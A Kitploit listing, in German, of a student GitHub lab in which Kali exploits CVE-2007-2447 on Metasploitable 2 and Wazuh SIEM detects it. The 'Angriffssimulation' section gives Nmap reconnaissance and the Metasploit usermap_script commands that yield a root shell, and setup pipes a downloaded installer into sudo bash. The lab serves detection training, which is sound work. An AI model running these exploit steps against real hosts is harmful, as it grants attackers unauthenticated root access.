Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Isoliertes AD/Linux-Angriffslabor: CVE-2007-2447 über Metasploit ausgenutzt, mit Wazuh SIEM erkannt, auf MITRE ATT&CK (T1190, T1059) abgebildet | Kitploit
Tools/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
AufklärungExploit-FrameworksSchwachstellenanalyseExploitationPenetrationstestsBedrohungsanalyseEinbruchserkennungLernen & BildungLog-Analyse

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Labs & Praxis
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Isoliertes AD/Linux-Angriffslabor: CVE-2007-2447 über Metasploit ausgenutzt, mit Wazuh SIEM erkannt, auf MITRE ATT&CK (T1190, T1059) abgebildet

Repository anzeigen
10vor 25 TagenNoch nicht geprüft
Teilen

🛡️ CVE-2007-2447 Exploitation & SIEM Detection Lab (Wazuh + MITRE ATT&CK)

B.Tech-Projekt (BTP) | IIIT Pune Basierend auf: „Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi

Ein voll funktionsfähiges Cybersecurity-Heimlabor auf einem einzigen Rechner, aufgebaut mit freien und Open-Source-Tools. Das Labor simuliert einen realistischen Angriffslebenszyklus — Reconnaissance → Exploitation → Detection — und zeigt, wie ein SIEM Angriffe in Echtzeit erkennen und der MITRE ATT&CK-Matrix zuordnen kann.


📐 Laborarchitektur

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard-Zugriff über den Browser
VMRolleIPTools
Kali Linux 2026.1Angreifer10.0.0.1Nmap, Metasploit
Metasploitable 2Opfer10.0.0.220+ Schwachstellen
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 Tools & Technologien

ToolVersionZweck
VirtualBox7.xHypervisor — betreibt alle VMs auf einem Host
Kali Linux2026.1Penetrationstest-Betriebssystem (offensiv)
Metasploitable 2v2.0Absichtlich verwundbares Zielsystem
Wazuhv4.7.5Open-Source-SIEM (defensiv)
NmapAktuellNetzwerk-/Portscanning
Metasploit FrameworkAktuellExploitation-Framework

🔧 Setup-Anleitung

Voraussetzungen

  • Ein Rechner mit mindestens 16 GB RAM (alle 3 VMs laufen gleichzeitig)
  • VirtualBox 7.x installiert
  • ~50 GB freier Festplattenspeicher

Schritt 1 — Netzwerkkonfiguration in VirtualBox

Erstellen Sie ein Internal Network namens cyberlab in VirtualBox. Alle drei VMs erhalten diesen Adapter. Die Ubuntu-/Wazuh-VM erhält zusätzlich einen Host-Only-Adapter, damit Sie das Dashboard über Ihren Browser erreichen können.


Schritt 2 — Kali Linux (Angreifer)

  1. Laden Sie das Kali Linux VirtualBox-Image herunter
  2. Importieren und weisen Sie den cyberlab-Internal-Network-Adapter zu
  3. Legen Sie eine statische IP fest:
root@kitploit:~
# /etc/network/interfaces bearbeiten
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Netzwerk neu starten: sudo systemctl restart networking

Schritt 3 — Metasploitable 2 (Opfer)

  1. Metasploitable 2 herunterladen
  2. In VirtualBox importieren und das cyberlab-Netzwerk zuweisen
  3. Statische IP festlegen:
root@kitploit:~
# /etc/network/interfaces bearbeiten
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Setzen Sie Metasploitable 2 niemals dem Internet aus. Es ist absichtlich unsicher.


Schritt 4 — Ubuntu + Wazuh SIEM (Verteidiger)

  1. Ubuntu Server 22.04 installieren
  2. Zwei Adapter zuweisen: cyberlab intern + Host-Only
  3. Statische IP über netplan konfigurieren (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Wazuh installieren (Single-Node):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Dashboard aufrufen unter: https://192.168.56.103 (über den Host-Browser)

Schritt 5 — Metasploitable über Syslog mit Wazuh verbinden

Da Metasploitable 2 keinen Wazuh-Agenten ausführen kann, konfigurieren Sie Syslog-Forwarding für agentenloses Monitoring:

Auf Metasploitable in /etc/rsyslog.conf hinzufügen:

root@kitploit:~
*.* @10.0.0.3:514

Auf Wazuh (Ubuntu) den Syslog-Eingang in /var/ossec/etc/ossec.conf aktivieren:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Wazuh neu starten: sudo systemctl restart wazuh-manager


⚔️ Angriffssimulation

Phase 1 — Reconnaissance (Nmap)

root@kitploit:~
# Von Kali aus
nmap -sV -O 10.0.0.2

Wichtige auf Metasploitable 2 entdeckte Dienste:

PortDienstVersion
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3

20+ offene Ports entdeckt. OS identifiziert: Linux 2.6.x


Phase 2 — Exploitation (Metasploit)

Schwachstelle: CVE-2007-2447 — Samba usermap_script Command Injection

Ermöglicht nicht authentifizierte Remote-Codeausführung über manipulierte MS-RPC-Anfragen bei Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# Von Kali aus — Metasploit starten
msfconsole

# Innerhalb von Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Root-Zugriff verifizieren
whoami
# Ausgabe: root

Phase 3 — Erkennung (Wazuh SIEM)

Nach dem Exploit erkannte Wazuh die Ereignisse automatisch und ordnete sie MITRE ATT&CK zu:

Regel-IDBeschreibungMITRE-TechnikTaktik
5402Erfolgreiches sudo zu ROOT ausgeführtT1548.003Privilege Escalation
5501PAM: Login-Sitzung geöffnetT1078Initial Access / Persistence
5502PAM: Login-Sitzung geschlossenT1078Defense Evasion
502Wazuh-Server gestartet—Erkennung aktiv

Erkannte Ereignisse gesamt: 55+

Dashboard aufrufen unter https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 Wichtigste Ergebnisse

  • ✅ Der vollständige Angriffslebenszyklus wurde erfolgreich in einer isolierten Umgebung nachgebildet
  • ✅ CVE-2007-2447 erzielte in Sekunden eine nicht authentifizierte Root-Shell
  • ✅ Das Wazuh-SIEM erkannte alle Angriffe und ordnete sie in Echtzeit MITRE ATT&CK zu
  • ✅ Syslog-Forwarding ermöglichte agentenloses Monitoring des veralteten Metasploitable-Systems
  • ✅ Das gesamte Labor läuft auf einem einzigen Host-Rechner mit 16 GB RAM

📁 Repository-Struktur

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← Sie sind hier
├── network-config/
│   ├── kali-interfaces.txt    ← Kali-IP-Konfiguration (statisch)
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu-/SIEM-netplan-Konfiguration
├── wazuh-config/
│   └── ossec.conf             ← Wazuh-Syslog-/Agent-Konfiguration
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Referenz-Forschungspapier

🔗 Referenz

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Haftungsausschluss

Dieses Labor ist vollständig auf isolierten virtuellen Maschinen aufgebaut und hat während der Angriffssimulationen keinen Internetzugriff. Alle Tools und Techniken werden ausschließlich für Bildungszwecke in einer kontrollierten Umgebung eingesetzt. Versuchen Sie nicht, Angriffstechniken auf Systemen zu replizieren, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


Präsentiert von Harshita Verma | IIIT Pune

Tool herunterladen